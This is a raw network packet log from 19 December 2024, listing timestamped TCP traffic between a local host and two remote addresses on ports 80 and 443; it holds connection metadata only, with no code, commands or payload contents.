                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.509561062 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.509568930 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.509572029 CET44349749172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.509623051 CET49749443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.512290001 CET49749443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.512320042 CET44349749172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.551898003 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.608560085 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.608757973 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.608768940 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.608788013 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.608819008 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.609044075 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.609080076 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.609098911 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.609165907 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.609812975 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.609859943 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.610024929 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.610043049 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.610157013 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.610430002 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.610441923 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.610483885 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.611110926 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.611123085 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.611151934 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.611179113 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.612916946 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.613804102 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.613817930 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.613827944 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.613883972 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.615781069 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.615828991 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.616758108 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.616777897 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.616791010 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.616812944 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.616831064 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.620243073 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.620255947 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.620268106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.620309114 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.620330095 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.621411085 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.623375893 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.623725891 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.623738050 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.623749971 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.623800039 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.624892950 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.624995947 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.627676010 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.627688885 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.627726078 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.627748013 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.628678083 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.628690958 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.628753901 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.630526066 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.631369114 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.631383896 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.631398916 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.631416082 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.631481886 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.631519079 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.632179022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.632191896 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.632204056 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.632249117 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.632265091 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.632922888 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.632941008 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.632952929 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.633002996 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.635055065 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.638151884 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.638284922 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.638318062 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.647825956 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.647926092 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.647959948 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.648367882 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.648570061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.648582935 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.648644924 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.649091005 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.649149895 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.649265051 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.649315119 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.649712086 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.649724960 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.649748087 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.649770021 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.649801970 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.650367022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.650378942 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.650389910 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.650440931 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.650480986 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.651104927 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.651139975 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.651158094 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.651185989 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.651221037 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.652093887 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.652108908 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.652124882 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.652159929 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.652180910 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.653114080 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.653129101 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.653139114 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.653151035 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.653254986 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.653254986 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.653254986 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.692712069 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807734013 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807817936 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807832956 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807832956 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807846069 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807861090 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807864904 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807873964 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807890892 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807902098 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807925940 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807935953 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807941914 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807949066 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807962894 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807975054 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807976961 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807990074 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.807996035 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808003902 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808006048 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808017969 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808026075 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808029890 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808058023 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808058977 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808068037 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808069944 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808087111 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808099985 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808111906 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808111906 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808113098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808128119 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808128119 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808142900 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808152914 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808156013 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808173895 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808187962 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808201075 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808212996 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808212996 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808226109 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808238983 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808239937 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808253050 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808285952 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.808434963 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812033892 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812048912 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812062979 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812096119 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812119961 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812119961 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812133074 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812146902 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812160015 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812174082 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812186003 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812186003 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812186956 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812201023 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812215090 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812222004 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812242985 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812253952 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812268019 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812279940 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812283039 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812293053 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812295914 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812309980 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812323093 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812324047 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812335968 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812347889 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812350035 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812359095 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812364101 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812376976 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812393904 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812423944 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812510014 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812597990 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812637091 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812659025 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812721014 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812742949 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812870979 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812917948 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812927008 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.812971115 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813019037 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813025951 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813081026 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813123941 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813132048 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813214064 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813263893 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813271999 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813483953 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813534975 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813544989 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813641071 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813688993 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813697100 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813745975 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813791037 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813800097 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813941002 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813956022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813967943 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813978910 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813985109 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813991070 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813997984 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.813998938 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814006090 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814011097 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814018011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814027071 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814032078 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814054012 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814073086 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814091921 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814096928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814111948 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814122915 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814136028 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814143896 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814143896 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814157009 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814168930 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814177036 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814212084 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814224958 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814239025 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814251900 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814254045 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814275980 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.814305067 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.818808079 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.818826914 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.818881035 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.821567059 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.821580887 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.821611881 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.821629047 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.834146023 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.834196091 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.837351084 CET804974331.41.244.11192.168.2.4
